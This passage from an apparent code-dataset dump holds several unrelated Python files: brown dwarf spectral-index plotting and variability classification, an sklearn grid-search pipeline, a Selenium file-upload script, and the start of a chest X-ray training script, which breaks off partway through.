0.25))\n ax12.set_ylim((index_temp_Jcurve_M2228 -0.22,index_temp_Jcurve_M2228 + 0.22))\n ax12.set_xlim((index_temp_J_H_M2228 -0.02,index_temp_J_H_M2228 + 0.02))\n \n #Add variability areas plot\n ax1.add_patch(patch00)\n ax2.add_patch(patch01)\n ax3.add_patch(patch02)\n ax4.add_patch(patch03)\n ax5.add_patch(patch10)\n ax6.add_patch(patch11)\n ax7.add_patch(patch12)\n ax8.add_patch(patch13)\n ax9.add_patch(patch20)\n ax10.add_patch(patch21)\n ax11.add_patch(patch22)\n ax12.add_patch(patch23)\n \n # Save and display the figure\n if save_index_index_plot == 'Yes':\n plt.savefig('index-index-plot.pdf', bbox_inches='tight')\n if save_index_index_plot == 'No':\n plt.show()\n \n #Define the point indices in each plot\n puntos00_var = []\n puntos01_var = []\n puntos02_var = []\n puntos03_var = []\n puntos10_var = []\n puntos11_var = []\n puntos12_var = []\n puntos13_var = []\n puntos20_var = []\n puntos21_var = []\n puntos22_var = []\n puntos23_var = []\n \n for i in indices_data.index:\n puntos00_var.append([indices_data['index_H'][i], indices_data['index_J'][i]])\n puntos01_var.append([indices_data['index_H'][i], indices_data['index_HJ'][i]])\n puntos02_var.append([indices_data['index_J_H'][i], indices_data['index_HJ'][i]])\n puntos03_var.append([indices_data['index_J_H'][i], indices_data['index_H'][i]])\n puntos10_var.append([indices_data['index_J_H'][i], indices_data['index_HJ'][i]])\n puntos11_var.append([indices_data['index_Jslope'][i], indices_data['index_J'][i]])\n puntos12_var.append([indices_data['index_Jslope'][i], indices_data['index_H'][i]])\n puntos13_var.append([indices_data['index_Jslope'][i], indices_data['index_HJ'][i]])\n puntos20_var.append([indices_data['index_Jslope'][i], 
indices_data['index_J_H'][i]])\n puntos21_var.append([indices_data['index_Jslope'][i], indices_data['index_Jcurve'][i]])\n puntos22_var.append([indices_data['index_H'][i], indices_data['index_Jcurve'][i]])\n puntos23_var.append([indices_data['index_J_H'][i], indices_data['index_Jcurve'][i]])\n \n #Determine the point indices inside the variability areas in each plot\n inside00_var = path00.contains_points(puntos00_var)\n inside01_var = path01.contains_points(puntos01_var)\n inside02_var = path02.contains_points(puntos02_var)\n inside03_var = path03.contains_points(puntos03_var)\n inside10_var = path10.contains_points(puntos10_var)\n inside11_var = path11.contains_points(puntos11_var)\n inside12_var = path12.contains_points(puntos12_var)\n inside13_var = path13.contains_points(puntos13_var)\n inside20_var = path20.contains_points(puntos20_var)\n inside21_var = path21.contains_points(puntos21_var)\n inside22_var = path22.contains_points(puntos22_var)\n inside23_var = path23.contains_points(puntos23_var)\n \n cant_plots_var=[]\n for i in range(0,len(indices_data)):\n cant_plots_var.append(sum([inside00_var[i],inside01_var[i],inside02_var[i],inside03_var[i], inside10_var[i],\n inside11_var[i],inside12_var[i],inside13_var[i],inside20_var[i],inside21_var[i],\n inside22_var[i],inside23_var[i]]))\n\n print(cant_plots_var)\n #Histogram variability\n \n fig = plt.figure(figsize=(6, 4.5))\n\n plt.rcParams['font.family'] = \"DejaVu Sans\" # Tipo de letra general\n plt.rcParams['font.size'] = 15 # Tamaño de letra general\n plt.rc('xtick', direction='in')\n plt.rc('ytick', direction='in')\n\n plt.xlabel('Number of spectral index combinations') \n plt.ylabel(' Number of selected sources')\n plt.tick_params(axis='x', which='major')\n plt.tick_params(axis='y', which='major')\n\n plt.hist(cant_plots_var, alpha=1,bins=100, width = 1,color= 'silver',edgecolor = 'black', linewidth=1)\n plt.axvline(8.88, color = 'black', ls='-', linewidth=3)\n plt.xlim((0,12))\n plt.legend(fontsize=11)\n\n fig.tight_layout(pad=0.8)\n \n # Save and display the figure\n if save_histogram_plot == 'Yes':\n plt.savefig('histogram-plot.pdf', bbox_inches='tight')\n if save_histogram_plot == 'No':\n plt.show()\n \n #pass threshold? 
\n\n    #pass threshold? 11\n    print('{}{}{}'.format('Your brown dwarf falls in ', cant_plots_var[0], ' variable areas of 12'))\n    if cant_plots_var[0] > 8:\n        a = print('Your brown dwarf is a candidate variable')\n    else:\n        a = print('Your brown dwarf is a candidate non-variable')\n    return a, cant_plots_var[0]\n\n\n\n\ndef LdwarfIndices(indices_data):\n    \n    ############################ Spectral indices template LP261-75B ###########################\n    \n    index_temp_mostH = 1.913080124768479\n    index_temp_mostJ = 0.23732289733907183\n    index_temp_less = 2.2632193763577337\n    index_temp_Jcurve = 1.363828699841246\n    index_temp_H2OJ = 0.7366212163364537\n    index_temp_CH4J = 0.7414549450272985\n\n    \n    ############################ define variability areas ###########################\n    \n    verts00 = [(3,5.3), (3,0.78), (0.9,-0.5), (3,5.3)]\n    verts01 = [(-0.55,2.262), (0.8,2.262), (0.8,0.78), (-0.55,0.78), (-0.55,2.32)]\n    verts02 = [(0,2.72), (1.5,1.8), (1.8,0.78), (0,0.78), (0,2.54)]\n    verts03 = [(0.3,3.5), (2.6,0.8), (0.3,0.7), (0.3,3.5)]\n\n    verts10 = [(0.3,2.92), (2.6,-1.8), (0.3,-1.3),(0.3,3.2)]\n    verts11 = [(0.4,0.8), (1.362,0.8), (1.366,-0.25),(0.4,-0.25),(0.4,0.8)]\n    verts12 = [(0.39,3), (2.35,3),(2.35,2.15),(0.39,1.62), (0.39,3)]\n    verts13 = [(-0.25,1.905), (1.9,1.905), (1.9,3), (-0.25,3), (-0.25,1.905)]\n\n    verts20 = [(-0.5,2.41), (0.8,1.51), (0.8,3), (-0.5,3), (-0.5,2.41)]\n    verts21 = [(0.739,0.8), (-0.25,0.8), (-0.25,-0.25), (0.742,-0.25),(0.739,0.8)]\n    verts22 = [(0.739,0.8), (1.4,0.8), (1.4,-0.25), (0.742,-0.25),(0.739,0.8)]\n    verts23 = [(0.2,2.24), (1.26,2.29), (1.26,0.7),(0.2,0.7),(0.2,2.24)]\n\n    verts30 = [(0.18,2.12), (1.26,1.74), (1.26,3), (0.18,3), (0.18,2.12)]\n    verts31 = [(-0.18,0.1), (1.8,1.42), (-0.18,1.7), (-0.18,0.1)]\n    verts32 = [(-0.18,1.368), (1.8,1.367), (1.8,0.4), (-0.18,0.4),(-0.18,1.368)]\n\n    codes_5v = [\n        Path.MOVETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.CLOSEPOLY,\n    ]\n    codes_4v = [\n        Path.MOVETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.CLOSEPOLY,\n    ]\n    codes_3v = [\n        Path.MOVETO,\n        Path.LINETO,\n        Path.LINETO,\n        Path.CLOSEPOLY,\n    ]\n    \n    path00 = Path(verts00, codes_3v)\n    path01 = Path(verts01, codes_4v)\n    path02 = Path(verts02, codes_4v)\n    path03 = Path(verts03, codes_3v)\n\n    path10 = Path(verts10, codes_3v)\n    path11 = Path(verts11, codes_4v)\n    path12 = Path(verts12, codes_4v)\n    path13 = Path(verts13, codes_4v)\n\n    path20 = Path(verts20, codes_4v)\n    path21 = Path(verts21, codes_4v)\n    path22 = Path(verts22, codes_4v)\n    path23 = Path(verts23, codes_4v)\n\n    path30 = Path(verts30, codes_4v)\n    path31 = Path(verts31, codes_3v)\n    path32 = Path(verts32, codes_4v)\n\n    patch00 = patches.PathPatch(path00, facecolor='gray', lw=1, alpha=0.25)\n    patch01 = patches.PathPatch(path01, facecolor='gray', lw=1, alpha=0.25)\n    patch02 = patches.PathPatch(path02, facecolor='gray', lw=1, alpha=0.25)\n    patch03 = patches.PathPatch(path03, facecolor='gray', lw=1, alpha=0.25)\n\n    patch10 = patches.PathPatch(path10, facecolor='gray', lw=1, alpha=0.25)\n    patch11 = patches.PathPatch(path11, facecolor='gray', lw=1, alpha=0.25)\n    patch12 = patches.PathPatch(path12, facecolor='gray', lw=1, alpha=0.25)\n    patch13 = patches.PathPatch(path13, facecolor='gray', lw=1, alpha=0.25)\n\n    patch20 = patches.PathPatch(path20, facecolor='gray', lw=1, alpha=0.25)\n    patch21 = patches.PathPatch(path21, facecolor='gray', lw=1, alpha=0.25)\n    patch22 = patches.PathPatch(path22, facecolor='gray', lw=1, alpha=0.25)\n    patch23 = patches.PathPatch(path23, facecolor='gray', lw=1, alpha=0.25)\n\n    patch30 = patches.PathPatch(path30, facecolor='gray', lw=1, alpha=0.25)
\n    patch31 = patches.PathPatch(path31, facecolor='gray', lw=1, alpha=0.25)\n    patch32 = patches.PathPatch(path32, facecolor='gray', lw=1, alpha=0.25)\n    \n    ######################### index-index plot ###########################\n\n    fig = plt.figure(figsize=(26.0,24), constrained_layout = True) # scale proportionally; each panel is roughly 6 x 4.5\n    plt.rcParams['font.family'] = \"DejaVu Sans\" # general font family\n    plt.rcParams['font.size'] = 28 # general font size\n    plt.rc('xtick', direction='in')\n    plt.rc('ytick', direction='in')\n    \n    ax1 = fig.add_subplot(441)\n    ax1.set_xlabel('mostH')\n    ax1.set_ylabel('less')\n    ax1.plot(index_temp_mostH,index_temp_less,marker ='*',markersize=30, color='black',zorder=3)\n    ax1.scatter(indices_data['index_mostH'],indices_data['index_less'],marker ='*',zorder=8)\n    ax1.set_ylim((index_temp_less -1.5,index_temp_less + 1.5))\n    ax1.set_xlim((index_temp_mostH -1,index_temp_mostH + 1))\n    ax1.add_patch(patch00)\n\n    ax2 = fig.add_subplot(442)\n    ax2.set_xlabel('mostJ')\n    ax2.set_ylabel('less')\n    ax2.plot(index_temp_mostJ,index_temp_less,marker ='*',markersize=30, color='black',zorder=3)\n    ax2.scatter(indices_data['index_mostJ'],indices_data['index_less'],marker ='*',zorder=8)\n    ax2.set_ylim((index_temp_less -1.5,index_temp_less + 1.5))\n    ax2.set_xlim((index_temp_mostJ - 0.2,index_temp_mostJ + 0.2))\n    ax2.add_patch(patch01)\n\n    ax3 = fig.add_subplot(443)\n    ax3.set_xlabel('CH4J')\n    ax3.set_ylabel('less')\n    ax3.plot(index_temp_CH4J,index_temp_less,marker ='*',markersize=30, color='black',zorder=3)\n    ax3.scatter(indices_data['index_CH4J'],indices_data['index_less'],marker ='*',zorder=8)\n    ax3.set_ylim((index_temp_less -1.5,index_temp_less + 1.5))\n    ax3.set_xlim((index_temp_CH4J -0.7,index_temp_CH4J + 0.7))\n    ax3.add_patch(patch02)\n\n    ax4 = fig.add_subplot(444)\n    ax4.set_xlabel('Jcurve')\n    ax4.set_ylabel('less')\n    ax4.plot(index_temp_Jcurve,index_temp_less,marker ='*',markersize=30, color='black',zorder=3)\n    ax4.scatter(indices_data['index_Jcurve'],indices_data['index_less'],marker ='*',zorder=8)\n    ax4.set_xlim((index_temp_Jcurve -1,index_temp_Jcurve + 1))\n    ax4.set_ylim((index_temp_less -1.5,index_temp_less + 1.5))\n    ax4.add_patch(patch03)\n\n    ax5 = fig.add_subplot(445)\n    ax5.set_xlabel('Jcurve')\n    ax5.set_ylabel('CH4J')\n    ax5.plot(index_temp_Jcurve,index_temp_CH4J,marker ='*',markersize=30, color='black',zorder=3)\n    ax5.scatter(indices_data['index_Jcurve'],indices_data['index_CH4J'],marker ='*',zorder=8)\n    ax5.set_ylim((index_temp_CH4J -0.7,index_temp_CH4J + 0.7))\n    ax5.set_xlim((index_temp_Jcurve -1,index_temp_Jcurve + 1))\n    ax5.add_patch(patch10)\n\n    ax6 = fig.add_subplot(446)\n    ax6.set_xlabel('Jcurve')\n    ax6.set_ylabel('mostJ')\n    ax6.plot(index_temp_Jcurve,index_temp_mostJ,marker ='*',markersize=30, color='black',zorder=3)\n    ax6.scatter(indices_data['index_Jcurve'],indices_data['index_mostJ'],marker ='*',zorder=8)\n    ax6.set_xlim((index_temp_Jcurve -1,index_temp_Jcurve + 1))\n    ax6.set_ylim((index_temp_mostJ - 0.2,index_temp_mostJ + 0.2))\n    ax6.add_patch(patch11)\n\n    ax7 = fig.add_subplot(447)\n    ax7.set_xlabel('Jcurve')\n    ax7.set_ylabel('mostH')\n    ax7.plot(index_temp_Jcurve,index_temp_mostH,marker ='*',markersize=30, color='black',zorder=3)\n    ax7.scatter(indices_data['index_Jcurve'],indices_data['index_mostH'],marker ='*',zorder=8)\n    ax7.set_xlim((index_temp_Jcurve -1,index_temp_Jcurve + 1))\n    ax7.set_ylim((index_temp_mostH -1,index_temp_mostH + 1))\n    ax7.add_patch(patch12)\n\n    ax8 = 
fig.add_subplot(448)\n ax8.set_xlabel('CH4J')\n ax8.set_ylabel('mostH')\n ax8.plot(index_temp_CH4J,index_temp_mostH,marker ='*',markersize=30, color='black',zorder=3)\n ax8.scatter(indices_data['index_CH4J'],indices_data['index_mostH'],marker ='*',zorder=8)\n ax8.set_xlim((index_temp_CH4J -0.7,index_temp_CH4J + 0.7))\n ax8.set_ylim((index_temp_mostH -1,index_temp_mostH + 1))\n ax8.add_patch(patch13)\n\n ax9 = fig.add_subplot(449)\n ax9.set_xlabel('mostJ')\n ax9.set_ylabel('mostH')\n ax9.scatter(indices_data['index_mostJ'],indices_data['index_mostH'],marker ='*',zorder=8)\n ax9.plot(index_temp_mostJ,index_temp_mostH,marker ='*',markersize=30, color='black',zorder=3)\n ax9.set_xlim((index_temp_mostJ - 0.2,index_temp_mostJ + 0.2))\n ax9.set_ylim((index_temp_mostH -1,index_temp_mostH + 1))\n ax9.add_patch(patch20)\n\n ax10 = fig.add_subplot(4,4,10)\n ax10.set_xlabel('CH4J')\n ax10.set_ylabel('mostJ')\n ax10.plot(index_temp_CH4J,index_temp_mostJ,marker ='*',markersize=30, color='black',zorder=3)\n ax10.scatter(indices_data['index_CH4J'],indices_data['index_mostJ'],marker ='*',zorder=8)\n ax10.set_xlim((index_temp_CH4J -0.7,index_temp_CH4J + 0.7))\n ax10.set_ylim((index_temp_mostJ - 0.2,index_temp_mostJ + 0.2))\n ax10.add_patch(patch21)\n\n ax11 = fig.add_subplot(4,4,11)\n ax11.set_xlabel('H2OJ')\n ax11.set_ylabel('mostJ')\n ax11.plot(index_temp_H2OJ,index_temp_mostJ,marker ='*',markersize=30, color='black',zorder=3)\n ax11.scatter(indices_data['index_H2OJ'],indices_data['index_mostJ'],marker ='*',zorder=8)\n ax11.set_xlim((index_temp_H2OJ -0.3,index_temp_H2OJ + 0.3))\n ax11.set_ylim((index_temp_mostJ - 0.2,index_temp_mostJ + 0.2))\n ax11.add_patch(patch22)\n\n ax12 = fig.add_subplot(4,4,12)\n ax12.set_xlabel('H2OJ')\n ax12.set_ylabel('less')\n ax12.plot(index_temp_H2OJ,index_temp_less,marker ='*',markersize=30, color='black',zorder=3)\n ax12.scatter(indices_data['index_H2OJ'],indices_data['index_less'],marker ='*',zorder=8)\n ax12.set_xlim((index_temp_H2OJ -0.3,index_temp_H2OJ + 0.3))\n ax12.set_ylim((index_temp_less -1.5,index_temp_less + 1.5))\n ax12.add_patch(patch23)\n\n ax13 = fig.add_subplot(4,4,13)\n ax13.set_xlabel('H2OJ')\n ax13.set_ylabel('mostH')\n ax13.plot(index_temp_H2OJ,index_temp_mostH,marker ='*',markersize=30, color='black',zorder=3)\n ax13.scatter(indices_data['index_H2OJ'],indices_data['index_mostH'],marker ='*',zorder=8)\n ax13.set_xlim((index_temp_H2OJ -0.3,index_temp_H2OJ + 0.3))\n ax13.set_ylim((index_temp_mostH -1,index_temp_mostH + 1))\n ax13.add_patch(patch30)\n\n ax14 = fig.add_subplot(4,4,14)\n ax14.set_xlabel('CH4J')\n ax14.set_ylabel('H2OJ')\n ax14.plot(index_temp_CH4J,index_temp_H2OJ,marker ='*',markersize=30, color='black',zorder=3)\n ax14.scatter(indices_data['index_CH4J'],indices_data['index_H2OJ'],marker ='*',zorder=8)\n ax14.set_xlim((index_temp_CH4J -0.7,index_temp_CH4J + 0.7))\n ax14.set_ylim((index_temp_H2OJ -0.3,index_temp_H2OJ + 0.3))\n ax14.add_patch(patch31)\n\n ax15 = fig.add_subplot(4,4,15)\n ax15.set_xlabel('H2OJ')\n ax15.set_ylabel('Jcurve')\n ax15.plot(index_temp_H2OJ,index_temp_Jcurve,marker ='*',markersize=30, color='black',zorder=3)\n ax15.scatter(indices_data['index_H2OJ'],indices_data['index_Jcurve'],marker ='*',zorder=8)\n ax15.set_xlim((index_temp_H2OJ -0.3,index_temp_H2OJ + 0.3))\n ax15.set_ylim((index_temp_Jcurve -1,index_temp_Jcurve + 1))\n ax15.add_patch(patch32)\n\n # Save and display the figure\n if save_index_index_plot == 'Yes':\n plt.savefig('index-index-plot.pdf', bbox_inches='tight')\n if save_index_index_plot == 'No':\n 
plt.show()\n    \n    ######################### Variable or not? #########################\n    \n    #Define the point indices in each plot\n    \n    puntos00_var = []\n    puntos01_var = []\n    puntos02_var = []\n    puntos03_var = []\n    puntos10_var = []\n    puntos11_var = []\n    puntos12_var = []\n    puntos13_var = []\n    puntos20_var = []\n    puntos21_var = []\n    puntos22_var = []\n    puntos23_var = []\n    puntos30_var = []\n    puntos31_var = []\n    puntos32_var = []\n    \n    for i in indices_data.index:\n        puntos00_var.append([indices_data['index_mostH'][i], indices_data['index_less'][i]])\n        puntos01_var.append([indices_data['index_mostJ'][i], indices_data['index_less'][i]])\n        puntos02_var.append([indices_data['index_CH4J'][i], indices_data['index_less'][i]])\n        puntos03_var.append([indices_data['index_Jcurve'][i], indices_data['index_less'][i]])\n        puntos10_var.append([indices_data['index_Jcurve'][i], indices_data['index_CH4J'][i]])\n        puntos11_var.append([indices_data['index_Jcurve'][i], indices_data['index_mostJ'][i]])\n        puntos12_var.append([indices_data['index_Jcurve'][i], indices_data['index_mostH'][i]])\n        puntos13_var.append([indices_data['index_CH4J'][i], indices_data['index_mostH'][i]])\n        puntos20_var.append([indices_data['index_mostJ'][i], indices_data['index_mostH'][i]])\n        puntos21_var.append([indices_data['index_CH4J'][i], indices_data['index_mostJ'][i]])\n        puntos22_var.append([indices_data['index_H2OJ'][i], indices_data['index_mostJ'][i]])\n        puntos23_var.append([indices_data['index_H2OJ'][i], indices_data['index_less'][i]])\n        puntos30_var.append([indices_data['index_H2OJ'][i], indices_data['index_mostH'][i]])\n        puntos31_var.append([indices_data['index_CH4J'][i], indices_data['index_H2OJ'][i]])\n        puntos32_var.append([indices_data['index_H2OJ'][i], indices_data['index_Jcurve'][i]])\n    \n    #Determine the point indices inside the variability areas in each plot\n    inside00_var = path00.contains_points(puntos00_var)\n    inside01_var = path01.contains_points(puntos01_var)\n    inside02_var = path02.contains_points(puntos02_var)\n    inside03_var = path03.contains_points(puntos03_var)\n    inside10_var = path10.contains_points(puntos10_var)\n    inside11_var = path11.contains_points(puntos11_var)\n    inside12_var = path12.contains_points(puntos12_var)\n    inside13_var = path13.contains_points(puntos13_var)\n    inside20_var = path20.contains_points(puntos20_var)\n    inside21_var = path21.contains_points(puntos21_var)\n    inside22_var = path22.contains_points(puntos22_var)\n    inside23_var = path23.contains_points(puntos23_var)\n    inside30_var = path30.contains_points(puntos30_var)\n    inside31_var = path31.contains_points(puntos31_var)\n    inside32_var = path32.contains_points(puntos32_var)\n    \n    cant_plots_var = []\n    for i in range(0,len(indices_data)):\n        cant_plots_var.append(sum([inside00_var[i],inside01_var[i],inside02_var[i],inside03_var[i],inside10_var[i],\n                                   inside11_var[i],inside12_var[i],inside13_var[i],inside20_var[i],inside21_var[i],\n                                   inside22_var[i],inside23_var[i],inside30_var[i],inside31_var[i],inside32_var[i]]))
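\n\n    # Aside (illustrative miniature with placeholder vertices, not one of the\n    # published regions): the verts/codes pattern used throughout -- MOVETO\n    # starts the polygon, LINETO draws its edges, CLOSEPOLY closes it -- gives\n    # a Path that doubles as a drawable patch and a membership test.\n    _demo_verts = [(0.2, 0.2), (0.8, 0.2), (0.8, 0.8), (0.2, 0.8), (0.2, 0.2)]\n    _demo_codes = [Path.MOVETO, Path.LINETO, Path.LINETO, Path.LINETO, Path.CLOSEPOLY]\n    _demo_path = Path(_demo_verts, _demo_codes)\n    _demo_patch = patches.PathPatch(_demo_path, facecolor='gray', lw=1, alpha=0.25)\n    # e.g. some_axis.add_patch(_demo_patch); _demo_path.contains_points([[0.5, 0.5]]) -> [True]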
\n\n    #pass threshold? 9\n    print('{}{}{}'.format('Your brown dwarf falls in ', cant_plots_var[0], ' variable areas of 15'))\n    if cant_plots_var[0] > 8:\n        a = print('Your brown dwarf is a candidate variable')\n    else:\n        a = print('Your brown dwarf is a candidate non-variable')\n    return a, cant_plots_var[0]\n\nif spt == 'T':\n    TdwarfIndices(indices_data)\nif spt == 'L':\n    LdwarfIndices(indices_data)\n\n","repo_name":"ntlucia/BrownDwarf-SpectralIndices","sub_path":"LTdwarfIndices_Set-indices.py","file_name":"LTdwarfIndices_Set-indices.py","file_ext":"py","file_size_in_byte":30959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}\n{"seq_id":"3736303563","text":"import os \n#import json\nimport numpy as np\nimport pandas as pd\nimport dill as pickle\n\nimport joblib\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.pipeline import make_pipeline\n\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.linear_model import LogisticRegression\n\nfrom models.gridCV.preprocess import PreProcessing\nfrom models.gridCV.feat_engineering import FeatEngineering\nfrom models.gridCV.feat_selection import FeatSelection\nfrom models.gridCV.matrix_transform import MatrixTransform\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\ndef ml_pipeline(train, target, ml_type):\n\n\t# 1. Define X, y and split\n\tX = [x for x in train.columns if x != target]\n\tX_train, X_test, y_train, y_test = train_test_split(train[X], train[target], test_size=0.5, random_state=42)\n\tprint(\"Shape: \", X_train.shape, X_test.shape, y_train.shape, y_test.shape)\n\ty_train = y_train.reset_index(drop=False)\n\n\tfor col in X_train.columns:\n\t\tif col in [\"PassengerId\", \"index\", \"Unnamed: 0\"]:\n\t\t\tX_train.drop(col, axis=1, inplace=True)
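\n\n\t# Aside (illustrative sketch; not one of this project's modules): the\n\t# PreProcessing/FeatEngineering/FeatSelection/MatrixTransform steps are\n\t# assumed to follow scikit-learn's transformer protocol -- fit() learns\n\t# state, transform() applies it -- which is what lets make_pipeline chain\n\t# them ahead of the estimator. A minimal custom transformer of that shape:\n\tclass DemoFillMissing(BaseEstimator, TransformerMixin):\n\t\t\"\"\"Illustrative only: fill numeric NaNs with medians learned in fit().\"\"\"\n\t\tdef fit(self, df, y=None):\n\t\t\tself.medians_ = df.median(numeric_only=True)\n\t\t\treturn self\n\t\tdef transform(self, df):\n\t\t\treturn df.fillna(self.medians_)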
\n\n\t# 2. Set pipeline\n\n\tif ml_type == \"Classifier\":\n\t\tpipe = make_pipeline(PreProcessing(),\n\t\t\t\t\t\t\t FeatEngineering(),\n\t\t\t\t\t\t\t FeatSelection(),\n\t\t\t\t\t\t\t MatrixTransform(),\n\t\t\t\t\t\t\t RandomForestClassifier())\n\n\t\tparam_grid = {\"randomforestclassifier__n_estimators\" : [10, 20, 30],\n\t\t\t\t\t \"randomforestclassifier__max_depth\" : [None, 6, 8, 10],\n\t\t\t\t\t \"randomforestclassifier__max_leaf_nodes\": [None, 5, 10, 20], \n\t\t\t\t\t \"randomforestclassifier__min_impurity_split\": [0.1, 0.2, 0.3]}\n\n\t\tgrid = GridSearchCV(pipe, param_grid=param_grid, cv=3)\n\t\tgrid.fit(X_train, y_train[target].values)\n\t\treturn grid\n\n\telif ml_type == \"Regressor\":\n\t\tprint(\"Regressor method\")\n\t\tpipe = make_pipeline(PreProcessing(),\n\t\t\t\t\t\t\t FeatEngineering(),\n\t\t\t\t\t\t\t FeatSelection(),\n\t\t\t\t\t\t\t MatrixTransform(),\n\t\t\t\t\t\t\t RandomForestRegressor())\n\n\t\tparam_grid = {\"randomforestregressor__n_estimators\": [10, 50],\n\t\t\t\t\t \"randomforestregressor__max_depth\": [None, 5],\n\t\t\t\t\t \"randomforestregressor__max_features\": [5, 10],\n\t\t\t\t\t \"randomforestregressor__min_samples_split\": [5, 10],\n\t\t\t\t\t \"randomforestregressor__min_samples_leaf\": [3, 10],\n\t\t\t\t\t \"randomforestregressor__bootstrap\": [True, False]}\n\n\t\tgrid = GridSearchCV(pipe, param_grid=param_grid, cv=3)\n\t\tgrid.fit(X_train, y_train[target].values)\n\t\treturn grid\n\n\telif ml_type == \"LogisticRegression\":\n\t\tpipe = make_pipeline(PreProcessing(),\n\t\t\t\t\t\t\t FeatEngineering(),\n\t\t\t\t\t\t\t FeatSelection(),\n\t\t\t\t\t\t\t MatrixTransform(),\n\t\t\t\t\t\t\t LogisticRegression())\n\n\t\tprint(\"SHAPE: \",X_train.shape, y_train[target].shape)\n\t\tpipe.fit(X_train, y_train[target].values)\n\t\treturn pipe\n\n\n\telif ml_type == \"Features\":\n\t\tPreProcessingInst = PreProcessing()\n\t\tFeatEngineeringInst = FeatEngineering()\n\t\tFeatSelectionInst = FeatSelection()\n\n\t\tX_train = PreProcessingInst.transform(df = X_train)\n\t\tX_train = FeatEngineeringInst.transform(df = X_train)\n\t\tX_train = FeatSelectionInst.transform(df = X_train)\n\n\t\tprint(\"Downloaded features data.\")\n\t\ty_train = y_train[target].to_frame()\n\t\tdf_feat = X_train.merge(y_train, left_index=True, right_index=True, how=\"inner\")\n\t\treturn df_feat\n\t\n\telse:\n\t\tprint(\"Warning: ml_type error\")\n\t\treturn None","repo_name":"pedrocarvalhodev/skyde","sub_path":"models/gridCV/model_pipeline.py","file_name":"model_pipeline.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}\n{"seq_id":"35690310472","text":"\nfrom selenium import webdriver\n\nimport time\n\ndriver = webdriver.Chrome(r\"d:\tools\webdrivers\chromedriver.exe\")\ndriver.implicitly_wait(10)\n\n\n\n\n# Navigate to the target page first\ndriver.get('https://tinypng.com/')\n\n# Trigger the file-selection dialog\ndriver.find_element_by_css_selector('.icon').click()\ntime.sleep(3)  # wait for the file dialog to pop up\n\n# Import win32com; Windows builds of Python usually ship with it\nimport win32com.client\n# Build the shell object; boilerplate usage, fine to copy verbatim\nshell=win32com.client.Dispatch(\"WScript.Shell\")\n# Call Sendkeys, which in effect types keystrokes blindly into the active\n# window (the default input method must be set to English)\nshell.Sendkeys(r\"d:\baidu.png\"+'\n')  # the trailing newline acts as the Enter key\n\n\n\n\n\n\n\n\n\n\n# driver.find_element_by_css_selector('.icon').click()\n# time.sleep(2)\n# # Sends keyboard messages directly to the current foreground application,\n# # which requires the browser to be the active window\n# # pip install pypiwin32\n#\n# import win32com.client\n#\n# shell=win32com.client.Dispatch(\"WScript.Shell\")\n#
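\n#\n# Aside (illustrative alternative using the standard Selenium element API,\n# not this script's approach): when the page exposes an <input type=file>\n# element, the path can be sent straight to it and no native dialog ever\n# appears. The selector below is a guess for illustration only.\n#\n#   upload = driver.find_element_by_css_selector('input[type=file]')\n#   upload.send_keys(r\"d:\baidu.png\")\n#\n# 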
shell.Sendkeys(r'd:\\baidu.png'+'\\n')\n\n\n\n\n\ninput('...')\n\ndriver.quit()","repo_name":"Kylin0827/Selenium_work","sub_path":"lesson06/uploadfile.py","file_name":"uploadfile.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42937162395","text":"import os, sys\nfrom pathlib import Path\nfrom torch.autograd import grad\nfrom tqdm import tqdm\nfrom sklearn.metrics import roc_auc_score\nimport torch\nimport numpy as np\nimport torch.nn as nn\nfrom opts import parse_args\nfrom models.densenet import densenet121\nfrom models.loss import NVUMREG\nfrom data.cx14_dataloader_cut import construct_cx14_cut as construct_cx14_loader\nfrom data.cxp_dataloader_cut import construct_cxp_cut as construct_cxp_loader\n\n# from data.openi import construct_loader\nfrom loguru import logger\nimport wandb\nfrom utils import *\nfrom eval_openi import test_openi\nfrom eval_pdc import test_pc\n\n# from eval_grad import get_grad\n\nBRED = color.BOLD + color.RED\nnih_stored_trim_list = \"epoch,Atelectasis,Cardiomegaly,Effusion,Infiltration,Mass,Nodule,Pneumonia,Pneumothorax,Edema,Emphysema,Fibrosis,Pleural_Thickening,Hernia,Mean\\n\"\n\n\ndef linear_rampup(current, rampup_length=10):\n current = np.clip((current) / rampup_length, 0.0, 1.0)\n return float(current)\n\n\ndef config_wandb(args):\n EXP_NAME = args.exp_name\n os.environ[\"WANDB_MODE\"] = args.wandb_mode\n # os.environ[\"WANDB_SILENT\"] = \"true\"\n wandb.init(project=EXP_NAME)\n wandb.run.name = args.run_name\n # wandb.run.dir = os.path.join(args.save_dir, args.run_name)\n config = wandb.config\n config.update(args)\n logger.bind(stage=\"CONFIG\").critical(\"WANDB_MODE = {}\".format(args.wandb_mode))\n logger.bind(stage=\"CONFIG\").info(\"Experiment Name: {}\".format(EXP_NAME))\n\n\ndef load_args():\n args = parse_args()\n return args\n\n\ndef log_init(args):\n log_base = os.path.join(args.save_dir, args.run_name)\n\n ck_log = os.path.join(log_base, \"cks\")\n Path(ck_log).mkdir(parents=True, exist_ok=True)\n\n grad_log = os.path.join(log_base, \"grads\")\n Path(grad_log).mkdir(parents=True, exist_ok=True)\n\n best_ck_log = os.path.join(log_base, \"model_best.pth\")\n info_log = os.path.join(log_base, \"info.log\")\n open(info_log, \"a\")\n logger.add(info_log, enqueue=True)\n\n train_csv = os.path.join(log_base, f\"pred_{args.train_data}.csv\")\n with open(train_csv, \"a\") as f:\n if args.trim_data:\n f.write(nih_stored_trim_list)\n\n openi_csv = os.path.join(log_base, \"pred_openi.csv\")\n with open(openi_csv, \"a\") as f:\n if args.trim_data:\n f.write(nih_stored_trim_list)\n\n pd_csv = os.path.join(log_base, \"pred_padchest.csv\")\n with open(pd_csv, \"a\") as f:\n if args.trim_data:\n f.write(nih_stored_trim_list)\n\n return {\n 